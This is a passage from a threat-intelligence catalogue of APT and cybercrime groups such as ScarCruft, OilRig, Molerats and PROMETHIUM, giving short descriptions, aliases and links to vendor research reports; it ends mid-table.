<h3 id="_stealth_falcon_2"><a class="anchor" href="#_stealth_falcon_2"></a><a class="link" href="#_stealth_falcon_2">Stealth Falcon</a></h3>
<div class="paragraph">
<p>Group targeting Emirati journalists, activists, and dissidents.</p>
</div>
<div class="paragraph">
<p>Stealth Falcon is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FruityArmor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2432. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://citizenlab.org/2016/05/stealth-falcon/">https://citizenlab.org/2016/05/stealth-falcon/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scarcruft"><a class="anchor" href="#_scarcruft"></a><a class="link" href="#_scarcruft">ScarCruft</a></h3>
<div class="paragraph">
<p>ScarCruft is a relatively new APT group; victims have been observed in several countries, including Russia, Nepal, South Korea, China, India, Kuwait and Romania. The group has several ongoing operations utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer.</p>
</div>
<div class="paragraph">
<p>ScarCruft is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Operation Daybreak</p>
</li>
<li>
<p>Operation Erebus</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2433. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/75082/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/">https://securelist.com/blog/research/75082/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pacifier_apt"><a class="anchor" href="#_pacifier_apt"></a><a class="link" href="#_pacifier_apt">Pacifier APT</a></h3>
<div class="paragraph">
<p>Bitdefender detected and blocked an ongoing cyber-espionage campaign against Romanian institutions and other foreign targets. The attacks started in 2014, with the latest reported occurrences in May of 2016. The APT, dubbed Pacifier by Bitdefender researchers, makes use of malicious .doc documents and .zip files distributed via spear phishing e-mail.</p>
</div>
<div class="paragraph">
<p>Pacifier APT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Skipper</p>
</li>
<li>
<p>Popeye</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2434. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf">http://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hummingbad_2"><a class="anchor" href="#_hummingbad_2"></a><a class="link" href="#_hummingbad_2">HummingBad</a></h3>
<div class="paragraph">
<p>This group created a malware that takes over Android devices and generates $300,000 per month in fraudulent ad revenue. The group effectively controls an arsenal of over 85 million mobile devices around the world. With the potential to sell access to these devices to the highest bidder</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2435. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf">http://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dropping_elephant"><a class="anchor" href="#_dropping_elephant"></a><a class="link" href="#_dropping_elephant">Dropping Elephant</a></h3>
<div class="paragraph">
<p>Dropping Elephant (also known as “Chinastrats” and “Patchwork“) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools. Its victims are all involved with Chinas foreign relations in some way, and are generally caught through spear-phishing or watering hole attacks.</p>
</div>
<div class="paragraph">
<p>Dropping Elephant is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Chinastrats</p>
</li>
<li>
<p>Patchwork</p>
</li>
<li>
<p>Monsoon</p>
</li>
<li>
<p>Sarit</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2436. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/75328/the-dropping-elephant-actor/">https://securelist.com/blog/research/75328/the-dropping-elephant-actor/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries">http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.forcepoint.com/security-labs/monsoon-analysis-apt-campaign">https://blogs.forcepoint.com/security-labs/monsoon-analysis-apt-campaign</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cymmetria.com/patchwork-targeted-attack/">https://www.cymmetria.com/patchwork-targeted-attack/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_operation_transparent_tribe"><a class="anchor" href="#_operation_transparent_tribe"></a><a class="link" href="#_operation_transparent_tribe">Operation Transparent Tribe</a></h3>
<div class="paragraph">
<p>Proofpoint researchers recently uncovered evidence of an advanced persistent threat (APT) against Indian diplomatic and military resources. Our investigation began with malicious emails sent to Indian embassies in Saudi Arabia and Kazakstan but turned up connections to watering hole sites focused on Indian military personnel and designed to drop a remote access Trojan (RAT) with a variety of data exfiltration functions.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2437. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf">https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scarlet_mimic_2"><a class="anchor" href="#_scarlet_mimic_2"></a><a class="link" href="#_scarlet_mimic_2">Scarlet Mimic</a></h3>
<div class="paragraph">
<p>Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group&#8217;s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda, it has not been concluded that the groups are the same.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2438. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Groups">https://attack.mitre.org/wiki/Groups</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_poseidon_group_2"><a class="anchor" href="#_poseidon_group_2"></a><a class="link" href="#_poseidon_group_2">Poseidon Group</a></h3>
<div class="paragraph">
<p>Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2439. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/">https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Groups">https://attack.mitre.org/wiki/Groups</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dragonok_2"><a class="anchor" href="#_dragonok_2"></a><a class="link" href="#_dragonok_2">DragonOK</a></h3>
<div class="paragraph">
<p>Threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. 2223 It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT.</p>
</div>
<div class="paragraph">
<p>DragonOK is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Moafee</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2440. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Groups">https://attack.mitre.org/wiki/Groups</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/">http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/">http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor">https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor">http://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_2"><a class="anchor" href="#_threat_group_3390_2"></a><a class="link" href="#_threat_group_3390_2">Threat Group-3390</a></h3>
<div class="paragraph">
<p>Chinese threat group that has extensively used strategic Web compromises to target victims.</p>
</div>
<div class="paragraph">
<p>Threat Group-3390 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TG-3390</p>
</li>
<li>
<p>Emissary Panda</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2441. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org">https://attack.mitre.org</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_projectsauron"><a class="anchor" href="#_projectsauron"></a><a class="link" href="#_projectsauron">ProjectSauron</a></h3>
<div class="paragraph">
<p>ProjectSauron is the name for a top level modular cyber-espionage platform, designed to enable and manage long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods. Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes. As such, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Usually APT campaigns have a geographical nexus, aimed at extracting information within a specific region or from a given industry. That usually results in several infections in countries within that region, or in the targeted industry around the world. Interestingly, ProjectSauron seems to be dedicated to just a couple of countries, focused on collecting high value intelligence by compromising almost all key entities it could possibly reach within the target area. The name, ProjectSauron reflects the fact that the code authors refer to Sauron in the Lua scripts.</p>
</div>
<div class="paragraph">
<p>ProjectSauron is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Strider</p>
</li>
<li>
<p>Sauron</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2442. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/">https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt_30"><a class="anchor" href="#_apt_30"></a><a class="link" href="#_apt_30">APT 30</a></h3>
<div class="paragraph">
<p>APT 30 is a threat group suspected to be associated with the Chinese government. While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches.</p>
</div>
<div class="paragraph">
<p>APT 30 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT30</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2443. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0013">https://attack.mitre.org/wiki/Group/G0013</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ta530"><a class="anchor" href="#_ta530"></a><a class="link" href="#_ta530">TA530</a></h3>
<div class="paragraph">
<p>TA530, who we previously examined in relation to large-scale personalized phishing campaigns</p>
</div>
</div>
<div class="sect2">
<h3 id="_gcman_2"><a class="anchor" href="#_gcman_2"></a><a class="link" href="#_gcman_2">GCMAN</a></h3>
<div class="paragraph">
<p>GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2444. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/73638/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/">https://securelist.com/blog/research/73638/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_suckfly_2"><a class="anchor" href="#_suckfly_2"></a><a class="link" href="#_suckfly_2">Suckfly</a></h3>
<div class="paragraph">
<p>Suckfly is a China-based threat group that has been active since at least 2014</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2445. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates">http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks">http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fin6_2"><a class="anchor" href="#_fin6_2"></a><a class="link" href="#_fin6_2">FIN6</a></h3>
<div class="paragraph">
<p>FIN is a group targeting financial assets including assets able to do financial transaction including PoS.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2446. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_libyan_scorpions"><a class="anchor" href="#_libyan_scorpions"></a><a class="link" href="#_libyan_scorpions">Libyan Scorpions</a></h3>
<div class="paragraph">
<p>Libyan Scorpions is a malware operation in use since September 2015 and operated by a politically motivated group whose main objective is intelligence gathering, spying on influentials and political figures and operate an espionage campaign within Libya.</p>
</div>
</div>
<div class="sect2">
<h3 id="_teamxrat_2"><a class="anchor" href="#_teamxrat_2"></a><a class="link" href="#_teamxrat_2">TeamXRat</a></h3>
<div class="paragraph">
<p>TeamXRat is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CorporacaoXRat</p>
</li>
<li>
<p>CorporationXRat</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2447. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/">https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_oilrig_2"><a class="anchor" href="#_oilrig_2"></a><a class="link" href="#_oilrig_2">OilRig</a></h3>
<div class="paragraph">
<p>OilRig is an Iranian threat group operating primarily in the Middle East by targeting organizations in this region that are in a variety of different industries; however, this group has occasionally targeted organizations outside of the Middle East as well. It also appears OilRig carries out supply chain attacks, where the threat group leverages the trust relationship between organizations to attack their primary targets.</p>
</div>
<div class="paragraph">
<p>OilRig is an active and organized threat group, which is evident based on their systematic targeting of specific organizations that appear to be carefully chosen for strategic purposes. Attacks attributed to this group primarily rely on social engineering to exploit the human rather than software vulnerabilities; however, on occasion this group has used recently patched vulnerabilities in the delivery phase of their attacks. The lack of software vulnerability exploitation does not necessarily suggest a lack of sophistication, as OilRig has shown maturity in other aspects of their operations. Such maturities involve:</p>
</div>
<div class="paragraph">
<p>-Organized evasion testing used the during development of their tools.
-Use of custom DNS Tunneling protocols for command and control (C2) and data exfiltration.
-Custom web-shells and backdoors used to persistently access servers.</p>
</div>
<div class="paragraph">
<p>OilRig relies on stolen account credentials for lateral movement. After OilRig gains access to a system, they use credential dumping tools, such as Mimikatz, to steal credentials to accounts logged into the compromised system. The group uses these credentials to access and to move laterally to other systems on the network. After obtaining credentials from a system, operators in this group prefer to use tools other than their backdoors to access the compromised systems, such as remote desktop and putty. OilRig also uses phishing sites to harvest credentials to individuals at targeted organizations to gain access to internet accessible resources, such as Outlook Web Access.</p>
</div>
<div class="paragraph">
<p>OilRig is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Twisted Kitten</p>
</li>
<li>
<p>Cobalt Gypsy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2448. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html">https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/">http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/oilrig/">http://www.clearskysec.com/oilrig/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cert.gov.il/Updates/Alerts/SiteAssets/CERT-IL-ALERT-W-120.pdf">https://cert.gov.il/Updates/Alerts/SiteAssets/CERT-IL-ALERT-W-120.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/">http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability%20">http://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability%20</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forbes.com/sites/thomasbrewster/2017/02/15/oilrig-iran-hackers-cyberespionage-us-turkey-saudi-arabia/#56749aa2468a">https://www.forbes.com/sites/thomasbrewster/2017/02/15/oilrig-iran-hackers-cyberespionage-us-turkey-saudi-arabia/#56749aa2468a</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/">https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/12/unit42-introducing-the-adversary-playbook-first-up-oilrig/">https://researchcenter.paloaltonetworks.com/2017/12/unit42-introducing-the-adversary-playbook-first-up-oilrig/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pan-unit42.github.io/playbook_viewer/">https://pan-unit42.github.io/playbook_viewer/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://raw.githubusercontent.com/pan-unit42/playbook_viewer/master/playbook_json/oilrig.json">https://raw.githubusercontent.com/pan-unit42/playbook_viewer/master/playbook_json/oilrig.json</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_volatile_cedar"><a class="anchor" href="#_volatile_cedar"></a><a class="link" href="#_volatile_cedar">Volatile Cedar</a></h3>
<div class="paragraph">
<p>Beginning in late 2012, a carefully orchestrated attack campaign we call Volatile Cedar has been targeting individuals, companies and institutions worldwide. This campaign, led by a persistent attacker group, has successfully penetrated a large number of targets using various attack techniques, and specifically, a custom-made malware implant codenamed Explosive .</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2449. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.checkpoint.com/downloads/volatile-cedar-technical-report.pdf">https://www.checkpoint.com/downloads/volatile-cedar-technical-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_malware_reusers"><a class="anchor" href="#_malware_reusers"></a><a class="link" href="#_malware_reusers">Malware reusers</a></h3>
<div class="paragraph">
<p>Threat Group conducting cyber espionage while re-using tools from other teams; like those of Hacking Team, and vmprotect to obfuscate.</p>
</div>
<div class="paragraph">
<p>Malware reusers is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Reuse team</p>
</li>
<li>
<p>Dancing Salome</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_terbium_2"><a class="anchor" href="#_terbium_2"></a><a class="link" href="#_terbium_2">TERBIUM</a></h3>
<div class="paragraph">
<p>Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2450. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/">https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_molerats_2"><a class="anchor" href="#_molerats_2"></a><a class="link" href="#_molerats_2">Molerats</a></h3>
<div class="paragraph">
<p>In October 2012, malware attacks against Israeli government targets grabbed media attention as officials temporarily cut off Internet access for its entire police force and banned the use of USB memory sticks. Security researchers subsequently linked these attacks to a broader, yearlong campaign that targeted not just Israelis but Palestinians as well. and as discovered later, even the U.S. and UK governments. Further research revealed a connection between these attacks and members of the so-called “Gaza Hackers Team.” We refer to this campaign as “Molerats.”</p>
</div>
<div class="paragraph">
<p>Molerats is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Gaza Hackers Team</p>
</li>
<li>
<p>Gaza cybergang</p>
</li>
<li>
<p>Operation Molerats</p>
</li>
<li>
<p>Extreme Jackal</p>
</li>
<li>
<p>Moonlight</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2451. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html">https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.vectranetworks.com/blog/moonlight-middle-east-targeted-attacks">http://blog.vectranetworks.com/blog/moonlight-middle-east-targeted-attacks</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_promethium_2"><a class="anchor" href="#_promethium_2"></a><a class="link" href="#_promethium_2">PROMETHIUM</a></h3>
<div class="paragraph">
<p>PROMETHIUM is an activity group that has been active as early as 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of server common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features—this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.</p>
</div>
<div class="paragraph">
<p>PROMETHIUM is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>StrongPity</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2452. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
